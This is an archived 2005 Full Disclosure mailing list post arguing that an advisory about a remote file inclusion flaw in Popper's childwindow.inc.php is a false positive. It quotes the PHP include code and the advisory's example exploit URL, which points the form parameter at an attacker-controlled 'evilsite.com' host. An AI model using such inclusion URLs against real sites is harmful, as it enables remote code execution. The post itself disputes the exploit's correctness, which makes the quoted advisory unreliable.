Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

fulldisclosure logo Full Disclosure mailing list archives

LSS.hr false positives.
From: "b0iler" <b0iler () r00thell org>
Date: Sat, 4 Jun 2005 22:15:26 +0100 (BST)
From your advisory @ http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-07:




Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script that can be
abused to execute arbitrary code.
Vulnerable code in childwindow.inc.php:

-----
...
   if(file_exists($form.".toolbar.inc.php")) {
       include($form.".toolbar.inc.php");
   }
?>


file_exists() only work on local files, not even with allow_url_fopen on does it work.  Even
if the file_exists() check was not there your discription of how to exploit it is incorrect:


To exploit this vulnerability, attacker has to put script like test.form.inc.php on
www.evilsite.com HTTP server, and call url like this:
http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test


they would need to have the file test.toolbar.inc.php, not test.form.inc.php.  It's quite
obvious you did not even bother testing this before issuing the advisory.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • LSS.hr false positives. b0iler (Jun 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]